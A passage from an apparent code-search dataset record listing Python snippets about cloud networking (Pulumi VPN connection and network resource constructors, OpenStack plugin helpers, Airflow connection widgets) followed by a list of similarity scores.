None:\n pulumi.set(__self__, \"tags\", tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def network(self):\n return self.__network",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def network_config(self) -> pulumi.Output['outputs.PrivateCloudNetworkConfig']:\n return pulumi.get(self, \"network_config\")",
"def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n resource_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", 'HybridConnection')\n if resource_id is not None:\n pulumi.set(__self__, \"resource_id\", resource_id)",
"def _extend_network_dict_provider(self, context, network, bindings=None):\n if 'id' not in network:\n return\n if not bindings:\n bindings = nsx_db.get_network_bindings(context.session,\n network['id'])\n\n # With NSX plugin, \"normal\" overlay networks will have no binding\n if bindings:\n # Network came in through provider networks API\n network[pnet.NETWORK_TYPE] = bindings[0].binding_type\n network[pnet.PHYSICAL_NETWORK] = bindings[0].phy_uuid\n network[pnet.SEGMENTATION_ID] = bindings[0].vlan_id",
"def instance_charge_type(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def get_plugin_description(self):\n return (\"BGP dynamic routing service for announcement of next-hops \"\n \"for private networks and floating IP's host routes.\")",
"def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")",
"def get_plugin_description(self):\n return constants.L2_GATEWAY_SERVICE_PLUGIN",
"def update_network_plugin_settings(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n network_plugin_mode = self.context.get_network_plugin_mode()\n if network_plugin_mode:\n mc.network_profile.network_plugin_mode = network_plugin_mode\n\n (\n pod_cidr,\n _,\n _,\n _,\n _\n ) = self.context.get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy()\n\n network_dataplane = self.context.get_network_dataplane()\n if network_dataplane:\n mc.network_profile.network_dataplane = network_dataplane\n\n if pod_cidr:\n mc.network_profile.pod_cidr = pod_cidr\n return mc",
"def test_support_NETWORK(self):\n self.assertEqual(self._parseFeature(\"NETWORK\", \"IRCNet\"), \"IRCNet\")",
"def spec(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def server_type_name(self):\n ...",
"def _get_nets_other(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_other() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_other().')\n return self.get_nets_other(*args, **kwargs)",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def affectedNet(*args, name: Union[AnyStr, bool]=\"\", type: AnyStr=\"\", q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def get_ui_field_behaviour() -> Dict:\n return {\n \"hidden_fields\": ['schema', 'port', 'extra', 'host'],\n \"relabeling\": {\n 'login': 'Fivetran API Key',\n 'password': 'Fivetran API Secret',\n },\n \"placeholders\": {\n 'login': 'api key',\n 'password': 'api secret',\n },\n }",
"def backend_info(self):\n\t\treturn {'valid': False}",
"def no_device(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"no_device\")",
"def get_connection_form_widgets() -> dict:\n from wtforms import StringField\n from flask_appbuilder.fieldwidgets import BS3TextFieldWidget\n\n return {\n \"extra__ewah_metabase__http_string\": StringField(\n \"Use http instead of https?\",\n widget=BS3TextFieldWidget(),\n )\n }",
"def _get_nets_lacnic(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_lacnic() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_lacnic().')\n return self.get_nets_lacnic(*args, **kwargs)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def networkInfo(self):\n assert False, \"Deriving class must implement\"",
"def network(self):\n return self._network",
"def network(self):\n return self._network"
] | [
"0.621237",
"0.5870624",
"0.56298715",
"0.5599445",
"0.54124904",
"0.5070947",
"0.5070947",
"0.4954396",
"0.4948518",
"0.4948518",
"0.49345273",
"0.48785043",
"0.48785043",
"0.4872126",
"0.48533687",
"0.48368704",
"0.4830044",
"0.48197207",
"0.47556755",
"0.47481972",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47227025",
"0.47191507",
"0.47101194",
"0.4705164",
"0.4705164",
"0.4704899",
"0.470364",
"0.47021765",
"0.4682506",
"0.4679322",
"0.4679322",
"0.46670604",
"0.46411052",
"0.46404392",
"0.46390113",
"0.46348542",
"0.46274227",
"0.461952",
"0.46127126",
"0.4600558",
"0.45920202",
"0.45889044",
"0.45879993",
"0.45835537",
"0.45835537",
"0.45835537",
"0.45771432",
"0.45590955",
"0.45566478",
"0.4555754",
"0.45549297",
"0.45418888",
"0.45403346",
"0.45257464",
"0.45231602",
"0.4520921",
"0.45205656",
"0.45172474",
"0.45152175",
"0.4510261",
"0.4510261",
"0.4508536",
"0.45081025",
"0.45075846",
"0.45063978",
"0.45039824",
"0.45022908",
"0.45019796",
"0.44996828",
"0.44996828",
"0.4428486",
"0.4427678",
"0.44254985",
"0.44182143",
"0.44139463",
"0.44116622",
"0.4409479",
"0.44035876",
"0.4396699",
"0.4383272",
"0.43792602",
